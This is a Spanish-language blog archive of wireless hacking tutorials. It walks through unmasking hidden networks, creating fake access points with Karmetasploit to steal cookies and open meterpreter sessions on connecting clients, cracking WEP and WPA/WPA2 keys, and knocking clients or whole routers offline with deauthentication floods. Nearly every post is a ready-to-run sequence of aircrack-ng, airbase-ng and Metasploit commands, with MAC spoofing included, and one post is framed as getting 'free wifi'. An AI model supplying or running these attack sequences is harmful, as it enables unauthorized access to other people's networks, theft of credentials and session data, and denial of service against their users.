Mostrando entradas con la etiqueta Seguridad Wireless. Mostrar todas las entradas

Ver el nombre de una red oculta


En este mini tutorial, les voy a enseñar a ver los nombres de las redes ocultas, que siempre es necesario saberlo tanto como para romper su password, como para conectarse.

Lo primero que debemos hacer, es poner nuestra interface en modo monitor. Explicaré brevemente este proceso, ya que lo he explicado varias veces en tutoriales previos.

1.- Identificamos el nombre de nuestra interface:

  1. airmon-ng

2.- La colocamos en modo monitor:

  1. airmon-ng wlan0 start

Lo mas probable, es que una vez hecho esto, su interface en modo monitor pase a llamarse mon0. En mi caso se llama wlan1, asique solo reemplacen el wlan1 por mon0 y listo.

El paso siguiente, es scannear y ver que redes hay disponibles. Para ellos utilizaremos el siguiente comando:

  1. airodump-ng wlan1

Y veremos algo como esto:


Como se ve en la captura, hay una red marcada en rojo llamada <length:    0>. Esta es nuestra red oculta. A su vez, con amarillo está resaltada su BSSID (MAC del Router).
Por otro lado, en la parte inferior, este BSSID vuelve a aparecer, y a su derecha aparece un STATION. Esto quiere decir, que hay un cliente conectado a ese router.
Cabe resaltar que para poder obtener el nombre de la red, debe haber alguien conectado. De lo contrario no se podrá.

Detenemos el scanneo presionando CTRL + C y colocamos el siguiente comando:

  1. airodump-ng -c 1 -w cap --bssid D8:5D:4C:C7:DC:EE wlan1

El parámetro del -c es el numero del canal. En este caso esta red está en el canal 1. Y en --bssid va la MAC del router.

Lo que hará esto, será escuchar solo a esa red incógnita.


Ahora en otra consola, pondremos lo siguiente:

  1. aireplay-ng -0 3 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 wlan1

Este comando es el que se suele utilizar para sacar las claves WPA. En el parámetro -a pondremos la MAC del router y en el parámetro -C pondremos la MAC del cliente conectado.
Una vez hecho esto, aparecerá el nombre de la red oculta:


Espero que les sirva!

Crear access points falsos con Karmetasploit


Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos Karmetasploit

Instalamos dhcpd3-server
sudo apt-get install isc-dhcp-server
Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the 
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}
Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies. Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0
airmon-ng start wlan0
Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:
ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:
airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0
Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red. Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0
Ahora iniciamos mestasploit con karma.
msfconsole -r karma.rc
Al iniciar karmetasploit les aparecerá:


Este post fue hecho por Stuxnet en el foro. Para dudas o consultas, sobre este tema, hacé click aca.


Airdriver-ng

Airdriver-ng es un script que provee información  acerca de los drivers inalámbricos en su sistema y la habilidad a cargar y descargar  los drivers. Adicionalmente, airdriver-ng le permite instalar y desinstalar los drivers  con los parches que son requeridos  para los modos de monitor y de la inyección. Entre otras funciones


Syntaxis
Airdriver-ng     (modelodedriver)

Comandos 

Supported                   Lista de todos los drivers que son soportados
Kernel                        Listar todos los drivers que estan kernel
Installed                     Mostrar todos los drivers instalados
Loaded                       Lista de drivers cargados
load                            Cargar driver
unload                        Descargar driver
reload                         Recargar driver
install                          Instalar driver driver
remove                       Remover  driver
remove stack             Removes a stack   
install stack               Instalar stack
details                        Mostrar detalles de drivers
detect                         Detectar las tarjetas de wireless

Este comando detectara las tarjetas de red que esten conectadas a nuestro OS

airdriver-ng detect



Airdriver-ng supported



Post realizado por Aika. Para saber más sobre el tema, haz click acá.


Crackear WEP´s - WPA/WPA2/PSK [Resumen de Codigos]

1. WEP`s [ARP request replay attack]:

 NOTA: En todos los casos reemplazar:
 XXXX: Interface
 ZZZZ: Canal
 YYYY: MAC BSSID
 RRR: ESSID

 1.1. Cambiar la MAC:

 A. airmon-ng (Ver la interface que usamos)
 B. airmon-ng stop XXXX (Detenemos el modo monitor)
 C. ifconfig XXXX down (Tiramos nuestra interface)
 D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
 E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)

 1.2. Buscar Redes:

 F. airodump-ng XXXX ( Scannea Redes)
 G. CTRL + C (Detiene el scanneo)
 H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos IVs) [No cerrar consola]

 1.3. Asociandonos a la red (En otra consola):

 I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)

 1.4 Inyectando Trafico:

 J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)

 1.5. Desencriptando la Clave (En otra consola):

 K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)

 2. WPA/WPA2/PSK:

 NOTA: En todos los casos reemplazar: 
 XXXX: Interface
 ZZZZ: Canal
 YYYY: MAC BSSID
 RRR: Interface modo monitor
 TTTT: Station

 2.1. Colocar la interface en modo monitor

 A. aimon-ng (Saber nuestra Interface)
 B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)

 2.2. Capturando el Handshake:

 C. airodump-ng RRR (Scannea redes)
 D. CTRL + C (Frena el scanneo)
 E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
 F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)

 2.3 Obteniendo la Clave:

 G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
 G.2. /pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)

DOS en una red Wireless [BackTrack]

En este mini paper les mostrare como tirar un cliente de una red.
Sirve tanto para redes WEP como para WPA/WPA2
La finalidad de este ataque es la de capturar un Handshake para luego obtener la password de la red inalambrica. No me hago cargo del mal uso que le puedan dar.

Iniciamos la consola y tipeamos

airmon-ng 

Es para saber el nombre de nuestra interface
Seguido a eso, la colocamos en modo monitor

airmon-ng start [Interface]

Como se puede ver, mi interface se llama Wlan0 y ahora la que se habilito en modo monitor, se llama mon0
Procedemos a scannear las redes o aps disponibles

airodump-ng [Interface modo monitor]

Como se puede ver en la imagen, el primer AP tiene varios clientes conectados. Asique con este ataque podria tirar la conexion de un cliente, y cuando este intente conectarse puedo capturar el Handshake.
Lo que debemos hacer ahora es observar en que canal esta. Y en mi caso esta en el 11.
Ahora solo ponemos nuestra interface a la escucha de ese canal con este comando. Para frenar el Scanneo anterior, presionamos CTRL + C y nos dejara escribir la nueva linea:

airmon-ng -c [CANAL] [Interface modo monitor]

El comando seria el siguiente:

aireplay-ng -0 N -a [MAC AP] -c [MAC CLIENTE] [Interface modo monitor]

Paso a explicar brevemente.
aireplay-ng es el comando de aircrack-ng para realizar el ataque
-0 es el numero de ataque, en este caso el ataque 0 es el de desauntetificacion. Que como hemos visto, consiste en desconectar al cliente.
 N la letra n debe ser reemplazada por un numero, yo en este ejemplo puse el numero 7. Que son las veces que enviara los paquetes de datos para desconectarlo. Si en lugar de 7, colocamos un 0, se volveria en un bucle infinito.
-a es la Mac del router (BSSID)
-c es la mac del cliente (STATION)
La interface en modo monitor, es la que colocamos antes en el airodump-ng

Como acabamos de ver, pudimos tirar a un cliente con este ataque. Pero ahora les voy a mostrar otra forma facil, para que no pueda conectarse ningun cliente.
En lugar de atacar al cliente, atacaremos al router para saturarlo y asi que nadie se pueda conectar.
El comando seria el siguiente

aireplay-ng -0 N -a [MAC AP] [Interface modo monitor]

Espero que les haya gustado!

Free Wifi [WEP] Parte I


1. Introducción:

En este tutorial les enseñare a crackear
WEPs con Backtrack desde cero.
En esta primer parte, veremos cómo hacerlo por medio de ARP Request replay attack. Este tipo de ataque es un ataque por envío o reproducción de dato. Y precisamente este ataque consiste en capturar esos datos que viajan en una determinada red. 

  
Como se muestra en la imagen, o al menos lo que intento mostrar, es que capturaremos datos que transmiten el cliente y el router metiéndonos en el medio de los dos.
Esos datos que capturaremos se llaman IVS. Mientras más tengamos, es más probable que obtengamos la contraseña.
Comenzaremos colocamos el DVD con Backtrack y booteamos desde la lectora. Veremos algo así:
Una vez seleccionada, cargara los archivos necesarios y colocaremos en la consola el comando:

startx

Una vez tipeado, presionamos enter y nos llevara al escritorio en donde encontraremos las herramientas para trabajar.
  
En la parte inferior derecha, veremos una bandera... Si damos click con el boton secundario de nuestro mouse, podremos cambiar el teclado por el español para que sea mas fácil insertar comandos en la consola.
Click derecho en la bandera, Configure, luego buscamos Spain en el menú izquierdo, doble click en ella, y ya la podremos seleccionar para utilizarla.

2. Cambiando nuestra MAC:

Lo primero que haremos será cambiar nuestra MAC, para que sea más fácil de recordar.
Accedemos a la consola y tipeamos:
airmon-ng

Como vemos en la imagen, mi interface se llama: wlan0
Lo que haremos ahora será detenerla. Para ello tipeamos:

airmon-ng stop wlan0

Una vez hecho esto tipeamos lo siguiente:
ifconfig wlan0 down

Ahora pasaremos a cambiar nuestra MAC. Para ello tipeamos:

macchanger --mac 00:11:22:33:44:55 wlan0

Si nos quedo algo como la imagen, quiere decir que hemos hecho todos los pasos correctamente.
Finalmente pondremos nuevamente nuestra tarjeta en modo monitor tipeando la siguiente línea:

airmon-ng start wlan0


3. Buscando Redes:

Para comenzar tipearemos la siguiente línea:

airodump-ng wlan0

Para este tutorial configure mi router con una pass WEP.

Como se puede ver, apareció mi red, y tiene encriptación WEP. Lo que haremos ahora será parar el scanneo presionando CTRL + C

4. Capturando Ivs:

Tipeamos la siguiente línea:

airodump-ng -c 1 -w underc0de --bssid D8:5D:4C:C7:DC:EE wlan0

Me detendré un poco a explicar. Como podrán ver, coloque en azul algunos parámetros.
En donde está el "1" debemos modificarlo por el CANAL, que es en donde está la CH en la Imagen 10. En mi caso es el canal 1.
Donde dice underc0de, debemos modificarlo por un nombre que nosotros queramos.
Por último en donde está la MAC, deben colocar la MAC que están atacando
Una vez ejecutada esta línea, comenzara a capturar los #DATA (Ivs), que son datos necesarios para luego descifrar la Pass.
 
5. Asociándonos a la red:

Lo que haremos ahora será asociarnos. Para ello abrimos otra consola, SIN CERRAR LA ANTERIOR, ya que seguirá capturando los #DATAs (Ivs) que necesitaremos más adelante.
En la nueva consola tipearemos:

aireplay-ng -1 0 -a D8:5D:4C:C7:DC:EE -h 00:11:22:33:44:55 -e ANTRAX wlan0

En esta línea modificaremos lo azul nuevamente.
En este caso la MAC por la que estamos atacando y en donde dice mi nombre por el ESSID que estamos atacando, que en mi caso se llama ANTRAX.
Si llegamos hasta acá, y nos aparece eso mismo de la imagen, quiere decir que hasta el momento hemos hecho las cosas a la perfección!
En caso contrario aparecerá algún tipo de error (unsuccessful), las causas pueden ser las siguientes:

- La red a la que quieres atacar está muy lejos.
- Tu tarjeta de red no puede hacer inyección de paquetes.
- El router tiene seguridad para evitar este tipo de ataques.

6. Inyectando Tráfico:

Tipeamos ahora en la misma consola el siguiente comando:

aireplay-ng -3 -b D8:5D:4C:C7:DC:EE -h 00:11:22:33:44:55 wlan0

Al igual que antes, modificamos la MAC en azul por la que estamos atacando. 
Una vez hecho esto, comenzara a inyectar tráfico y los #DATAs comenzaran a subir velozmente.
Si llegamos hasta acá, y tenemos todo bien, estamos a solo un paso. Recuerden que es necesario capturar muchos #DATAs, mientras más tengamos mejor. La cantidad de #DATAs que debamos capturar dependerá de que tan complicada sea la Pass.

7. Desencriptando la Password:

Hemos llegado al final... En una tercera consola, tipearemos lo siguiente:

aircrack-ng underc0de-01.cap

Como siempre modificamos lo azul por el nombre que pusimos previamente en el paso 4.
Al ejecutar el comando, la pass se comenzara a desencriptar.
Esperamos un momento a que se desencripte, y si todo esta correcto, nos tirara la pass, de lo contrario deberemos seguir capturando mas #DATAs hasta obtener la pass.
Como pueden ver, en mi caso la pass es: under

8. Despedida:

Bueno, espero que les haya gustado y les sirva este tutorial.
Cualquier duda que tengan pueden postearla en el blog


Greetz: Flemon

Desencriptando redes con Grim Wepa


Introducción

Grimwepa es una aplicación hecha en java, es multiplataforma y sirve para desencriptar redes inalámbricas sin la necesidad de ingresar comandos en la consola.
Para este tutorial les mostrare como sacar una password de una red con encriptación WEP.
Esta aplicación es gratuita y la pueden conseguir en internet. Esta en portugués, pero es muy fácil entenderla.

Conociendo la aplicación
 Bueno, como se puede ver, esta es la aplicación. Seguramente la primera vez que la ejecuten la verán amarilla, y eso es porque en la parte inferior derecha se le puede cambiar el color… Aun así, lo estético poco hace en cuanto a lo funcional, por lo tanto el color es lo de menos.
Para ubicarlos mejor, he numerado las funciones más vitales o al menos las que utilizaremos en este tutorial.
1.       Wifi Interface: Es la interface que tenemos a modo monitor. En otras palabras, seria la tarjeta de red, adaptador usb, etc. que utilizaremos para atacar la red.
2.       Todos los Canales: Seleccionamos todos los canales, para que a la hora de scannear, nos muestre una extensa lista de redes para atacar.
3.       Buscar Redes: El botón buscar, como bien dice la palabra, sirve para buscar redes dentro del alcance.
4.       Método de Ataque: Aquí se selecciona que tipo de ataque vamos a realizarle a la red seleccionada.
5.       Iniciar Ataque: Se autentica a la red y comienza la captura de Ivs.
6.       Iniciar cracking: A partir de los Ivs capturados, la suite de aircrack los desencripta hasta obtener la password.

Scanneo y ataque
 Una vez seleccionada la interface en modo monitor, presionamos el botón Buscar.

Para este tutorial me centrare en la red con encriptación WEP llamada “Posada Olivar”.
Lo que debo hacer ahora, es seleccionarla y elegir un ataque.

Como se puede ver en la imagen nos permite seleccionar varios tipos de ataques. Entre los cuales podemos ver Arp-replay, Chop-Chop, Fragmentation, Caffe-latte, p0841 attack, Passive capture.
Yo seleccionare el de Fragmentacion, ya que es el que mejores resultados me da.
De todas formas cabe aclarar que cada router es un caso aparte. Algunos pueden ser vulnerables al ataque de fragmentación, otros al chop-chop, otros a todos y otros a ninguno. Es cuestión de ir probando. También hay que ver si hay o no clientes conectados, etc.
Lo que se hace es poner un ataque y esperar de 3 a 5 minutos y si no captura datas, entonces pasar al ataque siguiente y así hasta lograr capturar paquetes.
Hay veces que pondremos iniciar taque y no avanzara, o saltara un cartel. Esto es porque no se ha podido autenticar a la red. Como consecuencia notaremos que la captura de Ivs es más lenta, en otros casos ni siquiera capturara, esto puede deberse a varios motivos y el más común es que estemos lejos de esa red…



Comenzando el Ataque

Una vez seleccionada la red y el ataque, presionamos en “Iniciar Ataque”.
Inmediatamente se autenticara a la red y comenzara la captura de Ivs. En caso de no autenticarse, es por que como dijimos antes, estamos lejos o el router tiene algún tipo de protección.
Podremos notar que se nos abre una nueva consola y nos mostrara los clientes en línea y los Ivs Capturados.
Los Ivs son los #Datas que muestra la consola.
Después de un rato, podremos notar que comenzaran a incrementar los Ivs.
Como se puede ver en la imagen, hace todo automático. Inyecta paquetes y captura Ivs.
Una vez pasado los 5000 Ivs, podemos empezar a crackear la password.

Crackeando la Password

Presionamos sobre el botón “Iniciar Cracking” y esperamos a tener suerte…
Como se puede ver, comenzó a crackear, y les mostrare ahora un caso muy particular. Que es cuando no tenesmos la suficiente cantidad de Ivs capturados.
Como se puede ver, dice que falló el ataque, y que vuelva a intentar cuando tenga 10.000 Ivs.
Seguimos esperando, un poco más a tener más Ivs
Como se aprecia, ya pase los 35.000, asique vuelvo a intentar crackear ahora…
Si  el programa cierra todas las consolas, es porque ya tiene la password.
Ahora si miramos el botón “Key tank (1)” Veremos ese número, eso quiere decir que tenemos 1 password capturada.
Si damos click en el, nos mostrara la password.
Bueno, la grilla esta, nos muestra una serie de información, como el nombre de la red, el tipo de encriptación, la contraseña, fecha y el tipo de ataque con el cual saco la password.
En mi caso la contraseña es 1551100960

Despedida

Espero que les haya gustado esta suite. Es de muy fácil uso. Cualquier duda que tengan pueden postearla en el blog!


Desencriptando redes WPA/WPA2


Introduccion:

En este tutorial les enseñare a crackear
WPA / WPA2 / PSK desde cero. En la primera parte que fue de como crackear WEPs desde cero vimos como iniciar desde el DVD de Backtrack, por lo tanto arrancaremos con la linea de comandos.
Este tutorial es compatible con cualquier versión del Backtrack.

Colocando nuestra interface en modo monitor:

Primero debemos saber como se llama nuestra interface, para ello tipeamos:
aimon-ng
Como vemos en la imagen, mi interface se llama wlan0. Ahora para ponerla en modo monitor tipeamos

airmon-ng start wlan0
Como podemos ver en la imagen 2, nos pone entreparentesis "(monitor mode enabled on mon0)", que sera la que utilizaremos.

Capturando el Handshake

La siguiente linea de comando scanneara las redes cercanas:

airodump-ng mon0 
  Como se puede ver, aparece una red llamada ANTRAX que sera la que atacare.
De este paso debemos tener en cuenta el canal, en este caso es 1. El BSSID y la STATION.
Una vez que sale la MAC de la red que deseamos atacar con una estacion, frenamos el scanneo presionando CTRL + C
Ahora tipearemos la siguiente linea:

airodump-ng mon0 --channel 1 --bssid D8:5D:4C:C7:DC:EE -w /tmp/wpa2


Seguido a esto nos aparecera una imagen de la red sin clientes conectados y en otra consola tipeamos:

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 70:F1:A1:94:E8:34 mon0 

Una vez tipeado esto, podremos ver que apareceran redes en la otra consola y podremos capturar el Handshake.
 
Como se puede ver en la imagen 8, hemos capturado el Handshake, ahora lo que nos queda es desencriptar la password. Esto se puede hacer de dos formas..
1 - Bruteandola con el Jonh The Ripper
2 - Por medio de Diccionario
En este tutorial veremos las dos Formas

Obteniendo la Clave

Para hacerla por medio de Aircrack utilizando el diccionario que trae Backtrack, tipeamos la siguiente linea:

aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst -b D8:5D:4C:C7:DC:EE /tmp/wpa2*.cap
En este caso estoy utilizando el diccionario que viene con Backtrack. Ustedes pueden utilizar sus propios diccionario y corrigen la ruta del mismo. 

 Como podran ver, ahi obtuvo la Clave y en este caso es: "thisisatest"

Ahora veamos la forma de hacerlo por medio de John The Ripper. 

Tipeamos el siguiente comando:

Backtrack 4:

/pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /tmp/wpa2*.cap
Backtrack 5:
/pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /tmp/wpa2*.cap

Recuerden cambiar la MAC por la que estan atacando y el directorio si es que lo modificaron.
Ambos metodos, tanto por diccionario como por John The Ripper suelen demorar dependiendo la dificultad de la contraseña.

Despedida:

Bueno, espero que les haya gustado y les sirva este tutorial y cualquier duda que tengan pueden postearla en el blog.